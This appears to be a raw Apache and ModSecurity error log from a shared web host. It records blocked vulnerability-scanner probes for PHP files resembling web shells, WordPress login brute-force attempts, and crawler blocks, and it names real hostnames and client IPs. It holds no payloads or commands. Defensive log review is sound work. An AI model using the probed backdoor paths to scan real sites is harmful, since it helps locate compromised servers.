[Tue May 26 19:07:58.716781 2026] [security2:error] [pid 6038:tid 6270] [client 4.201.75.230:52625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWiNlHA3ZmGrHHEr4qrOAAAAOs"]
[Tue May 26 19:07:58.716926 2026] [security2:error] [pid 6038:tid 6270] [client 4.201.75.230:52625] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWiNlHA3ZmGrHHEr4qrOAAAAOs"]
[Tue May 26 19:07:58.748576 2026] [security2:error] [pid 6038:tid 6245] [client 137.74.16.192:52979] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWiNlHA3ZmGrHHEr4qrOQAAANI"]
[Tue May 26 19:07:59.243733 2026] [security2:error] [pid 6038:tid 6293] [client 51.161.37.186:24202] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "strapptech.com"] [uri "/"] [unique_id "ahWiN1HA3ZmGrHHEr4qrTQAAAQI"]
[Tue May 26 19:07:59.243831 2026] [security2:error] [pid 6038:tid 6293] [client 51.161.37.186:24202] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "strapptech.com"] [uri "/"] [unique_id "ahWiN1HA3ZmGrHHEr4qrTQAAAQI"]
[Tue May 26 19:07:59.693465 2026] [security2:error] [pid 6038:tid 6280] [client 4.201.75.230:52622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/core/init.php"] [unique_id "ahWiN1HA3ZmGrHHEr4qrXgAAAPU"]
[Tue May 26 19:07:59.693590 2026] [security2:error] [pid 6038:tid 6280] [client 4.201.75.230:52622] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/core/init.php"] [unique_id "ahWiN1HA3ZmGrHHEr4qrXgAAAPU"]
[Tue May 26 19:07:59.723502 2026] [security2:error] [pid 6038:tid 6118] [remote 123.30.233.13:43332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWiN1HA3ZmGrHHEr4qrVwAAxE8"]
[Tue May 26 19:07:59.929349 2026] [security2:error] [pid 6038:tid 6107] [remote 43.239.92.149:56974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiN1HA3ZmGrHHEr4qraQAA0UQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:07:59.933636 2026] [security2:error] [pid 6038:tid 6281] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiN1HA3ZmGrHHEr4qrVgAAAPY"]
[Tue May 26 19:08:00.610242 2026] [security2:error] [pid 6038:tid 6183] [client 4.201.75.230:52628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/aa.php"] [unique_id "ahWiOFHA3ZmGrHHEr4qrdAAAAJQ"]
[Tue May 26 19:08:00.610344 2026] [security2:error] [pid 6038:tid 6183] [client 4.201.75.230:52628] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/aa.php"] [unique_id "ahWiOFHA3ZmGrHHEr4qrdAAAAJQ"]
[Tue May 26 19:08:01.169652 2026] [security2:error] [pid 6038:tid 6229] [client 4.201.75.230:52660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/xmrlpc.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qrjAAAAMI"]
[Tue May 26 19:08:01.169797 2026] [security2:error] [pid 6038:tid 6229] [client 4.201.75.230:52660] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/xmrlpc.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qrjAAAAMI"]
[Tue May 26 19:08:01.536205 2026] [security2:error] [pid 6038:tid 6243] [client 4.201.75.230:52552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/class.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qrnwAAANA"]
[Tue May 26 19:08:01.536373 2026] [security2:error] [pid 6038:tid 6243] [client 4.201.75.230:52552] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/class.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qrnwAAANA"]
[Tue May 26 19:08:01.614797 2026] [security2:error] [pid 6038:tid 6291] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qriwAAAQA"]
[Tue May 26 19:08:01.747423 2026] [security2:error] [pid 6038:tid 6236] [client 78.95.208.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiOVHA3ZmGrHHEr4qrkAAAAMk"]
[Tue May 26 19:08:02.125576 2026] [security2:error] [pid 6038:tid 6257] [client 4.201.75.230:52607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/goods.php"] [unique_id "ahWiOlHA3ZmGrHHEr4qrrAAAAN4"]
[Tue May 26 19:08:02.125697 2026] [security2:error] [pid 6038:tid 6257] [client 4.201.75.230:52607] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/goods.php"] [unique_id "ahWiOlHA3ZmGrHHEr4qrrAAAAN4"]
[Tue May 26 19:08:02.515309 2026] [security2:error] [pid 6038:tid 6275] [client 4.201.75.230:52545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/info.php"] [unique_id "ahWiOlHA3ZmGrHHEr4qrtgAAAPA"]
[Tue May 26 19:08:02.515424 2026] [security2:error] [pid 6038:tid 6275] [client 4.201.75.230:52545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/info.php"] [unique_id "ahWiOlHA3ZmGrHHEr4qrtgAAAPA"]
[Tue May 26 19:08:02.736804 2026] [core:crit] [pid 6038:tid 6201] (13)Permission denied: [client 40.77.167.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:08:04.254923 2026] [security2:error] [pid 6038:tid 6290] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiO1HA3ZmGrHHEr4qr1gAAAP8"]
[Tue May 26 19:08:06.454400 2026] [security2:error] [pid 6038:tid 6177] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiPVHA3ZmGrHHEr4qsIgAAAI4"]
[Tue May 26 19:08:08.055011 2026] [security2:error] [pid 6038:tid 6228] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiP1HA3ZmGrHHEr4qsUQAAAME"]
[Tue May 26 19:08:08.649836 2026] [security2:error] [pid 6038:tid 6187] [client 67.218.5.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiQFHA3ZmGrHHEr4qsbgAAAJg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:08:10.131740 2026] [security2:error] [pid 6038:tid 6261] [client 67.218.5.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWiQlHA3ZmGrHHEr4qsvgAAAOI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1468693&moderation-hash=0c9063f6107a2da6453851c4029817d3
[Tue May 26 19:08:10.796576 2026] [security2:error] [pid 6038:tid 6173] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiQlHA3ZmGrHHEr4qs0QAAAIo"]
[Tue May 26 19:08:13.195994 2026] [security2:error] [pid 6038:tid 6282] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiRFHA3ZmGrHHEr4qtdwAAAPc"]
[Tue May 26 19:08:13.982947 2026] [security2:error] [pid 6038:tid 6126] [remote 92.205.188.156:44978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiRVHA3ZmGrHHEr4qtmgAAyVc"]
[Tue May 26 19:08:14.132865 2026] [security2:error] [pid 6038:tid 6149] [remote 18.190.7.192:55094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWiRVHA3ZmGrHHEr4qtngAAnm4"]
[Tue May 26 19:08:14.275491 2026] [security2:error] [pid 6038:tid 6113] [remote 18.209.220.99:48856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiRlHA3ZmGrHHEr4qtogAA30o"]
[Tue May 26 19:08:14.528779 2026] [security2:error] [pid 6038:tid 6115] [remote 18.209.220.99:48856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiRlHA3ZmGrHHEr4qtrwAAr0w"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:14.608097 2026] [security2:error] [pid 6038:tid 6194] [client 67.218.5.58:50103] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWiRVHA3ZmGrHHEr4qtlgAAAJ8"], referer: https://anujtradingco.com
[Tue May 26 19:08:14.624071 2026] [security2:error] [pid 6038:tid 6168] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiRlHA3ZmGrHHEr4qtpQAAAIU"]
[Tue May 26 19:08:14.847993 2026] [security2:error] [pid 6038:tid 6123] [remote 18.190.7.192:55094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWiRlHA3ZmGrHHEr4qttgAA6lQ"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 19:08:15.428450 2026] [security2:error] [pid 6038:tid 6111] [remote 92.205.188.156:44978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiR1HA3ZmGrHHEr4qtyAAAy0g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:15.556611 2026] [security2:error] [pid 6038:tid 6259] [client 203.83.39.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWiRlHA3ZmGrHHEr4qtrgAAAOA"]
[Tue May 26 19:08:17.230968 2026] [security2:error] [pid 6038:tid 6224] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiSFHA3ZmGrHHEr4qt9gAAAL0"]
[Tue May 26 19:08:18.101490 2026] [autoindex:error] [pid 6038:tid 6214] [client 138.68.51.85:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/new/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:18.156242 2026] [autoindex:error] [pid 6038:tid 6252] [client 138.68.51.85:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/greenfood/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:18.157364 2026] [autoindex:error] [pid 6038:tid 6172] [client 138.68.51.85:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:18.180748 2026] [autoindex:error] [pid 6038:tid 6216] [client 138.68.51.85:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:18.182774 2026] [autoindex:error] [pid 6038:tid 6201] [client 138.68.51.85:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:08:19.437586 2026] [security2:error] [pid 6038:tid 6268] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiSlHA3ZmGrHHEr4quRQAAAOk"]
[Tue May 26 19:08:21.663297 2026] [security2:error] [pid 6038:tid 6272] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiTVHA3ZmGrHHEr4quoAAAAO0"]
[Tue May 26 19:08:22.102159 2026] [security2:error] [pid 6038:tid 6066] [remote 54.39.210.233:21518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWiTlHA3ZmGrHHEr4quyQABAhs"]
[Tue May 26 19:08:22.102359 2026] [security2:error] [pid 6038:tid 6293] [client 54.39.210.233:21518] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWiTlHA3ZmGrHHEr4quyQABAhs"]
[Tue May 26 19:08:22.197878 2026] [security2:error] [pid 6038:tid 6057] [remote 222.165.190.235:34132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiTVHA3ZmGrHHEr4quxQAA5RI"]
[Tue May 26 19:08:22.733474 2026] [security2:error] [pid 6038:tid 6058] [remote 222.165.190.235:34132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiTlHA3ZmGrHHEr4qu6QAA_RM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:23.472929 2026] [security2:error] [pid 6038:tid 6189] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiT1HA3ZmGrHHEr4qu-AAAAJo"]
[Tue May 26 19:08:23.530913 2026] [security2:error] [pid 6038:tid 6080] [remote 51.222.168.107:58114] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ucdc.co.in"] [uri "/"] [unique_id "ahWiT1HA3ZmGrHHEr4qvFQAA5Sk"]
[Tue May 26 19:08:23.531159 2026] [security2:error] [pid 6038:tid 6264] [client 51.222.168.107:58114] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ucdc.co.in"] [uri "/"] [unique_id "ahWiT1HA3ZmGrHHEr4qvFQAA5Sk"]
[Tue May 26 19:08:24.977283 2026] [security2:error] [pid 6038:tid 6069] [remote 50.6.207.27:46690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiUFHA3ZmGrHHEr4qvUAAAsx4"]
[Tue May 26 19:08:25.081712 2026] [security2:error] [pid 6038:tid 6175] [client 123.16.63.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiUFHA3ZmGrHHEr4qvSwAAAIw"]
[Tue May 26 19:08:25.234202 2026] [security2:error] [pid 6038:tid 6081] [remote 50.6.207.27:46690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiUVHA3ZmGrHHEr4qvXAAA1Co"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:08:25.309535 2026] [security2:error] [pid 6038:tid 6256] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiUFHA3ZmGrHHEr4qvTgAAAN0"]
[Tue May 26 19:08:28.047095 2026] [security2:error] [pid 6038:tid 6240] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiU1HA3ZmGrHHEr4qvkwAAAM0"]
[Tue May 26 19:08:28.482955 2026] [security2:error] [pid 6038:tid 6239] [client 145.133.40.33:20864] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahWiVFHA3ZmGrHHEr4qvqQAAAMw"]
[Tue May 26 19:08:29.104898 2026] [security2:error] [pid 6038:tid 6295] [client 85.208.96.197:44232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWiVVHA3ZmGrHHEr4qvvgAAAQQ"]
